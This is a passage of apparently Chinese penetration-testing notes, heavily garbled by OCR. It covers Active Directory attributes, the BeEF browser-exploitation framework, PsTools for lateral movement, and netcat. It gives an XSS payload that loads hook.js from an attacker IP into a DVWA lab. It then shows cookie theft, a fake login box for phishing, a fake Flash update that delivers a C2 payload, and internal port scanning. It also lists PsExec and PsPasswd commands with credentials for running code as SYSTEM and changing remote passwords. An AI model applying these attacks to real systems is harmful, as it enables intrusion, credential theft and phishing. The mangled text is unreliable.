区 分 名 (DN, Distinguished Name) 一 个 条 目的 区 分 名 称 叫做 "dn" 或 者 叫做 区 分 名 。 在 一 个 目录 中 
这 个 名 称 总 是 唯一 的 。 


EN=Common Name 为 用 户 名 或 服务 器 名 ， 最 长 可 以 到 80 个 字符 ， 可 以 为 中 文 ; 








DU-Organization Unit 为 组 织 单元 ， 最 多 可 以 有 四 级 ， 每 级 最 长 32 个 字符 ， 可 以 为 中 文 ; 
P=Organization 为 组 织 名 ， 可 以 3 一 64 个 字符 长 
ECountry 为 国家 名 ， 可 选 ， 为 2 个 字符 长 

例如 : 


ebjectClass 的 值 是 user， 那 么 就 是 域 用 户 ; 值 是 computer， 那 么 就 是 域 机 器 





me 的 值 是 域 用 户 的 名 字 或 者 域 机 器 的 名 字 





当然 不 仅仅 是 域 用 户 和 域 机 器 ， 还 有 其 他 的 对 象 。 


用 户 信息 参数 名 对 照 图 





Published Cemficate: | Member ПІ | Олача | Qtwect | бесшеу | Envsonment 
Seton Remote control Temna Services РюНе Ом, 


` 
`< Exchange General E mad Addrecse 
objectCategory À " Exchange Feature Exchange Advanced Additional Account Info 
74 General | Adde Account Prohie Telephone Ürgancahon 


- ry * 
| Шы | MET distinguishedName 
givenName Р Fockelet, Philipp i 
LU  — = EIN 


displayName men re M 
m wien | telephoneNumber % 
| otherTelephone 


LIP 
-....... 
“se 


Бей name Friog nta 


]elephone number 443 22: Other { 
£ mat phápp сесі ей 
Web page nir elagu de е 


`` uN 
3 wWWHomePage 





f { 
OF | Cad | | 






lockoutTime 


badPasswordTime ЖЫ msDS-User-Account-Control-Computed 


badPwdCount <n ea А 


v User must change password at nest logon 


—— 
Published Certhicates | Member OF Dialan | ОБ ecunty | Environment | 
esr Remote control Tertia Sereces Proite COM» | 
Exchange General E mal Adresse 
n : Exchange Feature Exchange Advanced Ағ Account info. | 
userPrincipalName ӘЖЕЙ Genes | зе: Account | Profle | Telephones | Organization | 
`. samAccountName 
М User logon nane l 
logonHours г eee о, 
- {КАРАУ ОРА ploecke ` 
um userWorkstations 
ы Logon Hout Log Gn Io 
P od 


...” E 
User cannot change pastword 


pwdLastSet АМ 
5% 
nTSecurityDescriptor ii Store patiword using reversible encryption 
e Account т: datied 
userAccountControl H М Smart card it requeed for eteractive logon 
- ^ Account is senstive and cannot be delegated 
7 Use DES erx types for ther account 


Password never expees 





V teque Kerberos presuthente ator | 


° 3 Neye 
accountExpires 4 SES 


Cance Apply 
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XSS 之 Beef 神 器 


Au —— 
= 


В! 
Beef 是 目前 最 为 流行 的 Web 框架 攻击 平台 ， 专注 于 利用 浏览 器 漏洞 ， 它 的 全 称 是 The Browser 
Exploitation Framework; 


Beef 提 供 一 个 web Я ИНЕ, REWATRA hook.js 页 面 ， 亦 或 者 加 载 了 hook.js 文件 的 浏览 
器 ， 就 会 不 断 的 以 GET 的 方式 将 其 自身 的 相关 消息 到 BeEF 的 server Wi 


Please wait as BeEF services are started. 


] You might need to refresh your browser once it opens. 
http://127.0.0.1:3000/ui/panel 
<script src="http://<IP>:3000/hook.js"></script> 
*] Example: «scr //127.0.0.1:3000/hook.js' 





L 


fox 









BeEF Authentication x [Ж Vulnerability: Stored x  http//192.1..3000/hookjs x + 


е © 127001 


E: 


Most Visitedy [Offensive Security % Kali Linux % Kali Docs % Kali Tools ж Exploit-DB WAircrack-ng КДКай Forums SA 





INT SOL BASICS v INION BASED v ERROR/DOUSBLE QUERY v TOOLS v VAF БҮРА м ENCO 
w Load URL 
Split UR 
ә Split URL 
ost data Referrer 4 ic ™ 一 URL w — 一 





9 





Username beef 


Password 
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Getting Started 


Hooked Browsers 


利用 
上 线 


往 存 在 XSS 漏 洞 的 地 方 插入 以 下 代码 

«script src="http://192.168.168.237:3000/hook.js"></script> 

当然 xss 的 payload 要 根据 是 否 存 在 waf 做 相对 应 的 绕 过 ， 核 心 就 是 加 载 该 hook.js 代 码 
例如 : 往 dvwa 靶 场 插入 xss 代 码 


JRL |http://192.168.168.190/DVWA-master 
JRL 


ite 


Post data Referrer Ж” OxHEX > тоо: w ^" BASE64 >” 


Home 





Instructions 





Setup | Reset DB 


<script srcz"http;//192.168.168.237:3000/hook js "» 
Brute Force қ 
Command Injection 
CSRF мап Guestbook Clear Guestbook 
File Inclusion —— FD KYT—JnI Á h 
File Upload 
Insecure CAPTCHA likas sN 


SQL Injection 
SQL Injection (Blind) 
Weak Session IDs 


wee mas 


那么 在 beef 上 可 以 看 到 浏览 器 已 经 上 线 了 
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Gettin arted Of 3 
fae ie 22 






A © 192.168.168.237 
ne Browsers 





eEF 


тык BROWSEN EXPLOITATION FRAMEWORK PROVECT 


Official website: http'irbeetpro, ту 
Getting Started 


Welcome to BeEF! 





Before being able to fully explore the framework you will have to hook a browser. To begin with 
point a browser towards the basic demo page here. or the advanced version here. 


If you want to hook ANY page (for debugging reasons of course), drag the following bookmark 
into your browser's bookmark bar, then simply click the shortcut on another page: Hook Ме! 


After a browser is hooked into the framework they will appear in the Hooked Browsers panel o 


择 各 种 工具 模块 


Current Browser 


192.168.168.190 Details і Commands Rider KssRays іре Network 
202 192.168.168.237 Module Tree Module Results History 
Browsers 

egal к. date label 


21 Browser (53) 

(J Chrome Extensions (5) 

|) Debug (9) 

i J Exploits (78) T 
(1 Host (22) 各 种 攻击 模块 
LL] IPEC (9) 


|... Metasploit (1) 

|. Misc (18) 

(J Network (19) 

Л Persistence (5) 

2) Phonegap (16) 

|... Social Engineering (21) 





\ 模 块 前 面 的 颜色 代表 着 不 同 的 意义 
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osos NN 


Module Tree 


Detect QuickTime 
Detect RealPlayer 
Detect Silverlight 
Detect Toolbars 
Detect Unity Web Player 
Detect Windows Media P 
Play Sound 
Remove Hook Element 
Unhook 
Webcam 
Webcam Permission Ch 
Detect Evernote Web Cli 
Detect VLC 
Get Visited Domains 
Get Visited URLs (Avant 
Webcam HTML5 
ü Detect Popup Blocker 
@ Detect ActiveX 
@ Detect Extensions 


da Detert FirPPRain 
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moduie has а taff ig ht ix efuch i$ used to indicate the fol 








command " 
gommand modu 
command modo 
command modu 





试 往 被 控 浏 览 器 弹 杠 


s 











mM omi 
b 
8 © 192.168.168.237 Module Tree Module Re History Create Alert Dialog 
1 s 
pme NR ome label Desorption: — Sends an alert dialog to the hooked browser 





ta 47 


sere 





Ajat text BEEF Alert Dialog 


Get Form Values 
Get Page HREF« 
Get Page HTML 


Get Page and drame P 








Remove stuck frame 
Replace HREFs 
Replace HREFs (С 
Replace HREFs (HTT 
i Replace HREFs (TEL 
Fingerprint дах 


Create Alert Dialog 











%URL Ж «Ж BASE64 Ж 








BeEF Alert Dialog 








Command resutsy 





Module Tree 







kate 
data cookie 


BEEF HOD Kaw, 





| 


HAS YAQZ МАҒ, ЗОМ. | 









ity sow, fiashistrue: PHPSESSIDzn7bteotk 
TQGWNDIADWOZ SF MWK WE rts 





ai j Browse (52) ^ command 1 





ed Doman (25) 


«mand 2 — — к ни нн 








707» 





Get Page HREFS 
бе! Page HTML 


Set Page ang frame P 


1762 


被 控 浏览 器 跳 转 到 百度 


ЗеЕЕ Control Panel x X 百度 一 下 ， 你 就 知道 x + 
' @ 127.0.0.1 







Most Visitedy BOffensive Security % Kali Linux \ Kali Docs 











Т е 2 SQLBASICSv UNION BASEDv ERROR, EQUERYv TOOLSY  WAFBYPASSv  ENCODINGw  HTMLv 

— Sa SE Cee tS PENES T uo 221272 о ВНИИ 

Split URL 

Execute 

Postdata Referrer 4 OxHEX Y = шк 2 
Hooked Browsers Current Browser 

j Online Browsers 

4 3 192.168.168.190 gene he 

Offline Browsers Module Tree Module Results History 

ва date label This module will redirect the selected hooked 
4 jBrowset 153) ROME 2015-1: )1114 command 1 ^ 





4 _j Hooked Domain (25) 1 2019.12.2011:14 command 2 ш ы 
on nO 2 2019.12-20 11:15 command 3 
Get Form Values Reawect URL: пиру аіди сот 
Get Page HREFs 


Get Page HTML 
Get Page апа frame F 


社工 弹 窗 


弹出 一 个 登录 框 ， 用 户 输入 密码 点 击 登录 之 后 ，beef 可 以 获取 到 密码 


Current Browser 


Commands 


Module Tree Module Results History Pretty Theft. 
好 date label Description: Asks the user for ther username and password using à floating ам. 
^i 0 2019-12.201119 command 1 7 5% 
Cickjsckng 1 201912201119 command? 
Fake LastPass Dialog Type Windows 
Шөл Download 
i Chippy Баски Grey 
@ Fake Flash Update Custom Logo — http.//9 0.0.0:3000/ui/mediamages/beef.png 
© Fake Мойсаһюп Bar (Ch (Generic only) 


qp Fake Notification Bar (Far 

& Fake Notihcabon Bar (IE) 
oie Pushing 

Pretty Theft 

кы decns iP ake 

和 Simple Hiacke 

@ TabNabbing 

@ Fake Evernote Web СІ 

@ Frelox Extension (Binds! 

@ Frretox Extension (Dro 

@ Frefox Extension (Rever; 

@ НТА PowerShell 

di SteKiowk Breakout 

dp Steal Autocomplete 


° mtu > 
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http://192. 168.168.190/DVWA-master 





— б 


Pipostdata _ Referrer Œ OxHEX X 全 












































er Net 
Enter your it nnect to th r 
ide Vulnera| | XSS 
23 == TA admi 
Instructions | 
Setup / Reset ОВ Name | 
Remember r redentials 
Brute Force Message 
| 
Command Injection OK 
CSRF ES pan = = 一 一 — 
Module Tree M Re list command result 
id date labe i 
| data answer-admin:password i 
4 С) Social Engineering (21) i 2019-12-20 command 1 | | 
Cickjacking 1 01119 command 2 sity ары Да I 
Fake LastPass А 1712-2052 
Lcamtuf Download 3 2222 
Сірру 
Fake Flash Update 
Fake Notification Bar (Ch 
В Fake Notification Bar (Fir 
7 Fake Notification Bar (IE 
Google Phishing 
Pretty Theft 
y Replace Videos (Fake P 
Simple Hijacker 
TabNabbing 
@ Fake Everno 
m е = 21| a 
目标 无 论点 击 哪 里 ， 都 无 法 跳 转 到 该 系统 到 其 他 页 面 
Module Tree rimar 
id date 
š data: resuit-Links have been rewritten to spawn an iFrame 
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— Vulnerability: Stored Cross Site Scripting (XSS) 





Instructions 
Setup / Reset DB 


Brute Force 
Command Injection 
CSRF 


Sign Guestbook Clear Guestbook 





File Inclusion 

File Upload 

Insecure CAPTCHA 
SQL Injection 

SQL Injection (Blind) 





社会 工程 学 攻击 


在 社工 这 一 栏 ， 可 以 选择 flash 更 新 这 类 功能 来 诱 使 用 户 升级 Flash， 当 用 户 点 击 之 后 ， 会 下 载 我 们 
的 恶意 文件 执行 ， 这 样 我 们 就 可 以 用 c2 控 制 用 户 的 系统 . 


Module Tree Module Results History 


кі date 
Create Foreground Fran ^ 
Create Pop Under 
аманы 


4 Social Engineenng (21) 







F 





сати D 


4 Fake Flash Update 


p Fake Notfication Bar (Ch 
F ication Bar (Fir 
ovfic ation Bar (IE) 
p Google Phishà 
Pretty Theft 
Replace Videos (Fake Ph 
P Simple Hijacker 











This is a test comment 








irent Browser 


Fake Flash Update 


labet Descriptor Prompts the user to install an update to Adobe Flash Player 
The delvered payload could be a custom fie, a browser extension or any spec: UR 


The provided BeEF Firefox extension PortBanning (ports 20, 21, 22, 25, 110. 
Java, overrides the UserAgent and thi aut home/new, tab page 
See /extencionspec/hies лі тк TargetFinder directory for the Firefox extension source 













os/fiash update с 
5 on latest Chrome 








hitp./0.0.0.0:3000/adobe^flash update png 


Custom Payload 


hitps-//github.com/bepfproJecibeelarchivelmaster zip 
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Home 
Instructions 


Setup / Reset DB 


Brute Force 
Command Injection 
CSRF 

File inclusion 

File Upload 
Insecure CAPTCHA 
SQL Injection 

SQL Injection (Blind) 
Weak Session IDs 
XSS (DOM) 

XSS (Reflected) 


— CSR. Бұра. 


https: fgithub.com/beefproject/beef/archive/master. zip 


内 网 扫描 


Bde n MM 


* The top 10 Facebook games use the Flash Player. То see more, 
* Most of the top video sites on the web use Flash Player 
* Flash Player is installed on over 1.3 billion connected PCs 


Note: If you have selected to allow Adobe to install updates, this update 


Will be installed on your system automatically within 45 days or you can 
choose to download it now. 


Network 用 于 收集 内 网 信息 ， 比 如 ping、 端 口 扫描 


мү 
Module Tree M esult 
кї iate 
ADC (2) ў 2019-12-20 11:35 
Cross-Origin Scanner 1 201 11:36 
DOSer 
Detect Burp 
Detect Social Networks 


Detect Tor 
Get Proxy Servers (WPA 
Get мор Network Hosts © 
DNS Enumeratior 
DNS Rebinding 
Fingerprint Loc 






i Netv 
Fingerprint Routers 
Get HTTP Serv 






Port Scanner 
Persistence (5) 


labe! 


command 1 


command 2 





scanner 
Descriptior Scan ports in à given hostname, using WebSockets, C 
to avoid blocked ports or Same Ongin Policy 
Note: The user may see authentication popups in the ev 
ing HTTP authenticatior 
Id 1 
scan IP or 192 168,110 
Hostname 
Specific port default 
1o scar 
Closed port 1100 
ut (ms) 
port 2500 
t ims) 
Delay betwee 600 
requests (ms) 
Debug false 





ORS and img tag: 


ent any of the ta 


S Browsers. 
Current Browser 


















кы E - А у ese = de 
алю f Commands Бөз | хәне | ec АРТЫН ф ж ? 
92158158231 Module Tree Module Results Hittory. Command results 
85 
M date abel 
—— ES data. portzScaniing ]92 J6Ë 168 180 ports 
j4DC (2 9 2019.12.2011.:38 command 1 15,7,9,15,20,21,22.23,25,26.20,33,37,42,43,53,67,68.69.70,76,78,80,86 90.98 101.106.104, 
Cioss-Orgie Scanner 1 — 201912201136 command 2 : 
DOSer 
Detect Burp 
Detest босла! Networks 
Dateci Tor 


Get Proxy Servers (WPA 
сермер Network Hosts. 
DNS Enumeration 

DNS Reninding 
Fingerprint Local Networi 
Fogerpeni Routers 

Get HTTP Servers (Fav 
IRC МАТ Pinning 

Identity LAN Subnets 
Ping Sweep 

Ping Sweep Java) 
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PsTools 是 具有 微软 官方 签名 的 windows 服 务 器 远程 管理 工具 ，PsTools 包 含 14 款 小 工具 ， 一 些 网 

络 管理 员 会 使 用 这 些 工 具 管 理 自己 的 服务 器 ， 或 者 根据 PsTools 开 发 特定 的 服务 器 管理 工具 。 — M 
然 PsTools 同 样 可 在 内 网 渗透 时 使 用 ， 部 分 杀毒 软件 可 能 会 报 该 工具 有 安全 威胁 或 报 毒 ， 但 官方 已 撤 
清关 系 ， 给 出 的 解释 是 PsTools 不 包含 任何 病毒 ， 请 放心 使 用 。 


бопе anti-virus scanners report that one or more of the tools аге infected with 


”Pstools 中 最 常用 的 工具 是 PsExec 与 PsLogList 


Pstools 


Я E n lownload.sysint is.com/files/PSTools.zip) ”Pstools 官 方 介绍 


把 工具 上 传 至 内 网 主机 中 。 
首先 来 简单 介绍 一 下 PsTools 中 14 款 小 工具 的 功能 ， 不 是 所 有 小 工具 都 会 在 内 网 渗透 中 使 用 。 


远程 主机 命令 执行 工具 
显示 远程 打开 的 文件 

- 列 出 远程 计算 机 SID 号 (通常 票据 传递 时 会 用 到 ) 
列 出 远程 主机 信息 

ping 高 级 版 (内 网 渗透 不 常用 ) 

P 结束 远程 计算 机 进程 

PsList ~ 查看 远程 计算 机 进程 

PsLoggedon - 查看 远程 计算 机 已 登录 用 户 
PsLogList - 获取 远程 主机 登录 日 志 

PsPasswd - 修改 远程 主机 用 户 密码 或 域 用 户 密 码 
PsService - 查看 远程 主机 服务 

PsShutdown - 关闭 或 重启 远程 主机 (不 推荐 使 用 ) 
PsSuspend - 暂停 远程 主机 进程 (不 推荐 使 用 ) 
PsUptime - 功能 已 加 入 到 Psinfo 


P ools 中 的 所 有 工具 都 支持 通过 ipc& 认 证 ， 即 只 要 通过 net use 远 程 主 机 后 ，pstools 中 的 任何 工 
芷 使 用 时 候 都 不 需 再 输入 帐号 密码 。 


1768 


pstools 中 工具 在 命令 行 执行 时 必须 添加 -accepteula 参数 ， 和 否则 会 在 操作 系统 中 弹出 允许 执行 窗 
口 ， 如 下 图 。 


| PsExec License Agreement x 


| eek can n also u use ethe /accepteula Commandiine Switch to accept the EU ЛА 








SYSINTERNALS SOFTWARE LICENSE TERMS 


[These license terms аге an agreement between Sysinternals (a wholly 
owned subsidiary of Microsoft Corporation) and you. Please read them. 
They apply to the software you are downloading from Systinternals.com, 

| which includes the media on which you received it, if any. The terms also 
apply to any Sysinternals 





updates, 
supplements, 
Internet-based services, and v 


Pint | Agree Decine | 





接 下 来 将 介绍 pstools 中 各 工具 使 用 方式 和 返回 结果 


PsFile 显示 远程 打开 的 文件 


显示 出 的 文件 通常 为 wmi、smb 等 打开 的 文件 或 管道 。 使 用 命令 : 如 果 已 对 目标 主机 执行 ijpc 操 
fr, #0 


net use \\192.168.255.131\c$ pass123 /user:administrator 
PsFile -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


PsFile -accepteula \\192.168.255.131 -u admin -p раѕ5123 
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返回 结果 如 下 图 
G:\intranet\tool\PSTools>psfile.exe -accepteula \\192.168.255.131 


psFile v1.03 - Lists files and directories opened remotely 
copyright (C) 2001-2016 Mark Russinovich 
Sysinternals 


Files opened remotely on 192.168.255.131: 


[10] C:\Windows\ 
User: Administrator 
Locks: 0 
Access: Read 

[13] C:\Users\Administrator 
User: Administrator 
Locks: 0 
Access: Read 

[14] C:\Users 
User: Administrator 
Locks: 0 
Access: Read 

[15] CX 
User: Administrator 
Locks: `0 
Access: Read 

[20] C:\USERS\ADMINISTRATOR\DESKTOP 
User: Administrator 
Locks: 0 
Access: Read 

[22] C:\Users\Administrator\Desktop\Everything. ini 
User: Administrator 
Locks: 0 
Access: Read 

[23] \srusuc 
User: Administrator 
Locks: 0 
Access: Read Write 


PsGetSid 列 出 远程 计算 机 SID 号 
该 sid 号 在 渗透 测试 中 会 在 票据 传递 中 使 用 使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


het use \\192.168.255.131\c$ раѕ5123 /user:administrator 
PsGetSid -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


PsGetSid -accepteula \\192.168.255.131 -u admin -p pass123 





返回 结果 如 下 图 
G:\intranet\tool\PSTools>PsGetsid ехе -accepteula \\192.168.255.131 


PsGetSid 91.85 - Translates 5105 to names and vice versa 
Copyright (C) 1999-2016 Mark Russinovich 
Sysinternals - www.sysinternals.com 


SID for \\192.168.255.131: 
$-1-5-21-1813641968-1616902898-2772989169 





Psinfo 列 出 远程 主机 信息 
该 工具 会 列 出 远程 主机 信息 ， 如 开机 时 间 等 。 
使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


net use \\192.168.255.131\c$ pass123 /user:administrator 
Psinfo -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


Psinfo -accepteula \\192.168.255.131 -u admin -p pass123 


返回 结果 如 下 图 
G:NintranetNtoolNPSTools>PsInfo.exe -accepteula \\192.168.255.131 


PsInfo 91.78 - Local and remote system information viewer 
Copyright (C) 2001-2016 Mark Russinovich 
Sysinternals - www.sysinternals.com 


System information for \\192.168.255.131: 

Uptime: © days 9 hours 26 minutes 3 seconds 

Kernel version: Windows Server 2012 R2 Standard, Multiprocessor Free 

Product type: Standard Edition 

Product version: 6.3 

Service pack: 0 

Kernel build number: 9600 

Registered organization: 

Registered owner: Windows ?? 

IE uersion: 9.9008 

System root: C:\Windows 

Processors: 4 

Processor speed: 2.5 GHz 

Processor type: Intel(R) Core(TM) 17-985ӨН CPU 0 
sical memory: 242 MB 

Uideo driver: UMuare, SUGA 3D 





Psping ping АЛЕ 


该 工具 不 常用 ， 使 用 参数 如 下 。 


Help usage: psping -? [i|t|l|b] 
Ші ICMP ping. 
EO t TCP ping. 
-21 ”延迟 测试 
-? b ”带宽 测试 
-nobanner ”不 输出 psping 产 品 信 息 


PsKill 结束 远程 计算 机 进程 
使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


net use \\192.168.255.131\c$ ра55123 /user:administrator 
PsKill -accepteula \\192.168.255.131 notepad.exe 


或 直接 在 命令 中 输入 账号 密码 


PsKill -accepteula \\192.168.255.131 -u admin -p pass123 notepad ,exe 


返回 结果 如 下 图 
G:\intranet\tool\PSTools>PsKill -accepteula NN192.168.255.131 поёераа. ехе 


25К111 91.16 - Terminates processes on local or remote systems 


opyright (C) 1999-2016 Mark Russinovich 
Jsinternals - www.sysinternals.com 





Process notepad.exe killed on 192.168.255.131. 


PsList 查看 远程 计算 机 进程 
使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


net use \\192.168.255.131\с$ ра55123 /user:administrator 
PsList -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


PsList -accepteula \\192.168.255.131 -u admin -p pass123 
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返回 结果 如 下 图 
G:\intranet\tool\PSTools>Pslist -accepteula \\192.168.255.131 


PsList 01.4 - Process information lister 
Copyright (C) 2000-2016 Mark Russinovich 
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Process information for 192.168.255.131 


Pid Pri Thd Hnd Priv Elapsed Time 
о ө Ч 9 9 :00:00.000 

4 8 110 1056 108 43:04.548 
240 11:72" 183 272 :43:04.548 
360 13 348 1812 :43:03.015 
424 13 87 868 :43:02. 749 
432 13 495 2416 :43:02 .749 
476 169 1828 :43:02 .546 
516 259 2600 43:02 484 
524 826 4436 43:02.453 
596 356 3672 43.02. 249 
640 399 3556 -43:02.187 
728 218 268268 -43:02.093 
740 67 988 -43:02.078 
622 13364 43:01 .999 


«e 
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PsLoggedOn 查看 远程 计算 机 已 登录 用 户 


此 操作 通常 是 想 查 看 远程 主机 是 否 有 管理 员 或 其 他 用 户 登录 ， 并 决定 是 否 dump hash、 登 录 远 程 
主机 远程 桌面 


使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


net use NN192.168.255.131Nc$ ра55123 /user:administrator 
PsLoggedOn -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


PsLoggedOn -accepteula \\192.168.255.131 -u admin -p ра55123 


返回 结果 如 下 图 
G:\intranet\tool\PSTools>PsLogged0n -accepteula \\192.168.255.131 
PsLoggedon v1.35 - See who's logged on 


Copyright (С) 2000-2016 Mark Russinovich 
Sysinternals - www.sysinternals.com 


Users logged on locally: 
2019/12/21 15:12:34 WUIN-IPOT3ORDGOMNadministrator 


Users logged on via resource shares: 
2019/12/27. 14:52:05 WIN-IPOT3ORDGOMNRdministrator 
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Pspasswd 修改 远程 主机 用 户 密码 或 域 用 户 密码 

此 操作 在 渗透 测试 中 不 常用 且 不 推荐 使 用 ， 除 非特 殊 情况 ， 如 hash 无 法 破解 ， 主 机 无 法 常规 登录 
等 。 

使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 

net use NN192.168.255.131Nc$ раѕ5123 /user:administrator 


Pspasswd -accepteula \\192.168.255.131 administrator newpassword 
PsPasswd -accepteula \\192.168.255.131 domain\administrator newpassword 


或 直接 在 命令 中 输入 账号 密码 


Pspasswd -accepteula \\192.168.255.131 -u admin -p ра55123 administrator Win200€ 
» 


返回 结果 如 下 图 


ranet\tool\PSTools>PsPasswd -accepteula NN192.168.255.131 administrator W 


- Local and remote passuord changer 
(C) 2003-2016 Mark Russinouich 
` www .suslnternals.com 


Password successfullu changed 





PsService 查看 远程 主机 服务 


使 用 命令 : 如 果 已 对 目标 主机 执行 ipc 操 作 ， 如 


net use \\192.168.255.131\с$ pass123 /user:administrator 
PsService -accepteula \\192.168.255.131 


或 直接 在 命令 中 输入 账号 密码 


PsService -accepteula \\192.168.255.131 -u admin -p ра55123 


1774 


返回 结果 如 下 图 
:\intranet\tool\PSTools>PsService -accepteula \\192. 168 255.131 
PsSeruice v2.25 - Service information and configuration utility 


Copyright (C) 2001-2010 Mark Russinouich 
Sysinternals ~ www.Sysinternals com 


SERUICE NAME: AdobeFlashPlauerUpdateSuc 
DISPLAY. E , Rdobe Flash Plauer Update iios n 


| 4f Adobe Flash Player FF FRB аласа өзегі; 
т\ PE : 10 WIN32_OWN_ PROCESS 
STATE : 1 STOPPED 
(NOT_STOPPABLE .NOT_PAUSABLE . 1СМОРЕЅ SHUTDOMN) 
WIN32_EXIT_CODE : 0 (0х0) 
SERUICE EXIT CODE : 6 (0x0) 
CHECKPOINT : 0х6 
WRIT, HINT : 0 ms 


SERUICE NAME: AeLookupSuc 
DISPLAY _ NAME d piacere 
5B 5E ЛУ RUTE oe FR AB re бу уд 
ТҮРЕ. : 20 WIN32_ SHARE “PROCESS | 
STATE ER STOPPED 
(NOT_STOPPABLE .NOT_PAUSABLE . IGNORES SHUTDOUN) 
WIN32_EXIT_CODE - 9 (0x0) 
SERUICE_EXIT_CODE : 0 (0х0) 
CHECKPOINT ; 0x0 
WAIT HINT ‚ O ms 


SERUICE NAME: ALG 
DISPLAV NAME: Application Layer Gateway Service 
5 Internet Ж ti 第 = thi 16109 1 
ТҮРЕ : 10 WIN32 _OWN PROCESS 
STATE : 1 STOPPED 
{NOT_STOPPABLE . NOT, PRUSRBLE . IGNORES SHUTDOWN) 
UIN32 EXIT CODE : 1077 (0x435) 
SERVICE_EXIT_CODE : 0 (0х0) 
CHECKPOINT : 0х0 
WALT HINT : O ms 





PsExec 远程 执行 命令 


渗透 测试 中 经 常用 到 该 工具 ， 如 对 远程 主机 执行 命令 证 明 权 限 、 执 行 c2 服 务 端 文件 使 远程 主机 上 
в, 使 用 命令 : 如 果 已 对 目标 主机 执行 pc 操作 ， 如 





net use \\192.168.255.131\с$ pass123 /user:administrator 
PsExec -accepteula \\192.168.255.131 whoami 


或 直接 在 命令 中 输入 账号 密码 


PsExec -accepteula \\192.168.255.131 -u admin -p раѕ5123 whoami 
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返回 结果 如 下 图 


intranet\tool\PSTools\PSTools>PsExec. exe -accepteula \\192.168.255.131 ыһоат1 


PsExec u2.2 - Execute processes remotely 
yright (С) 2001-2016 Mark Russinovich 
sinternals ~ www.sysinternals.com 


win-ipOt3Ordgqm\administrator - 
whoami exited on 192.168.255.131 with error code 0 





PSsExec 加 -s 人 参数 为 以 系统 权限 执行 命令 ， 如 下 


PsExec.exe -accepteula -5 \\192.168.255.131 whoami 


返回 结果 如 下 图 
\intranet\tool\PSTools\PSTools>PsExec.exe -accepteula -s \\192.168.255.131 who 
ami 


хес u2.2 - Execute processes remotely 
pyright (С) 2001-2016 Mark Russinovich 


sinternals - www.sysinternals.com 


nt authority\system 
whoami exited on 192.168.255.131 with error code 0. 


PsLogList 导出 远程 主机 登录 日 志 


内 网 渗透 时 经 常会 导出 windows 登 录 日 志 ( 远 程 桌面 、smb、ftp 等 )， 并 分 析 日 志 中 管理 员 登 录 的 
ip， 从 而 确定 管理 员 位 置 或 跳板 机 位 置 。 





PsLogList 导 出 建议 指定 日 志 中 包含 字符 (登录 成 功 特定 字符 串 )，win 2003 与 xp 登录 成 功 字 符 串 相 
同 ，win7 及 之 后 系统 登录 成 功 字符 串 相 同 。 


导出 远程 主机 一 周 的 登录 记录 并 写 入 文件 (适用 2003&xp): 


psloglist -acceptEula \\IP -u username -p password -d 7 -f "Success Audit" Secur 


导出 远程 主机 一 周 的 登录 记录 并 写 入 文件 (适用 win7 及 以 上 版 本 系统 ): 


Psloglist -acceptEula \\IP -u username -p password -d 7 -f "Audit Success" Sect 
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之 后 从 日 ; 志文 件 中 (此 处 为 log7day.txt) 寻 找 ip， 如 下 图 ， 登 录 ip 为 192.168.255.131， 登录 进程 为 
winlogon， 可 能 为 远 元 程 桌面 或 smb 登 录 。 


11651) Microsoft-Windows-Security-Auditing 
Type: SUCCESS AUDIT 
оре WIN-IPOT30RDGQM 
Time: 2019/12/29 20:02:21 ID: 4624 
已 成 功 登 录 帐 户 
使 用 者 : 
5-1-5-18 
WIN-IPOT3ORDGQUS 
WORKGROUP 
Ox3e7 
10 
%%1833 
5-1-9-21-1813641968-1616902898-2772989169-500 
Administrator 
WIN-IPOT30RDGQM 
0x2d953c 
100000000-0000-0000-0000-000000000000) 


0x888 
C: Windows \System32\winlogon. exe 
WIN-IPOT3ORDGQM 
192. 168. 255. бе» 
0 








| : User32 
| š 数据 包 ; Negotiate 
| (RIR Sa pn 
0 
在 被 访问 的 计算 机 上 生成 此 事件 : 
明 本 地 系统 上 请 求 登 录 的 帐户 。 这 通常 是 一 个 服务 (例如 Server 服务 ) 或 本 地 进程 (例如 Winlogon. exe 或 Services. exe) 
Жанел BS MARE 5 FARNE (RGS) 
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Netcat 使 用 总 结 


NC (netcat) 被 称 为 网 络 工具 中 的 瑞士 车 刀 ， 体 积 小 巧 ， 但 功能 强大 
:-# nc -h 

[у1.10-41.1+01] 

соппесї їо ѕотемћеге: пс [-options] hostname рогі [5] [ports] 

listen for inbound: nc -l -p port [-options] [hostname] [port] 

optlons: 





shell commands as `-e'; use /bin/sh to exec [dangerous!!] 
filename program to exec after connect [dangerous!!] 
allow broadcasts 
gateway source-routing hop point[s], up to 8 
num source-routing pointer: 4, 8, 12, 
this cruft 
secs delay interval for lines sent, ports scanned 
set keepalive option on socket 
listen mode, for inbound connects 
numeric-only IP addresses, no DNS 
hex dump of traffic 
local port number 
randomize local and remote ports 
quit after EOF on stdin and delay of secs 
local source address 
set Type Of Service 
answer TELNET negotiation 
UDP mode 
verbose [use twice to be more verbose] 
timeout for connects and final net reads 
Send CRLF as line-ending 
гего-1/0 mode [used for scanning] 
port numbers can be individual or ranges: lo-hi [inclusive]; 
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’). 


-C 
-е 
-b 
-g 
-6 
-h 
=] 
-k 
-l 
-n 
-0 
-P 
-r 
-9 
-6 
-T 
-t 
-u 
-у 
-W 
-C 
-2 





-е «prog» 程序 重 定向 

-g < 网 关 > 设置 路 由 器 跃 程 通 信 网 关 ， 最 多 可 设置 8 个 ， 

-G < 指向 器 数目 > 设置 来 源 路 由 指向 器 ， 其 数值 为 4 的 倍数 ; 

-h 帮助 ; 

-i < 延迟 秒 数 > 设置 时 间 间 隔 ， 以 便 传送 信息 及 扫描 通信 端口 ; 

p 使 用 监听 模式 ， 管 控 传 入 的 资料 ; 

-n 直接 使 用 IP 地 址 ， 而 不 通过 域名 服务 器 ; 

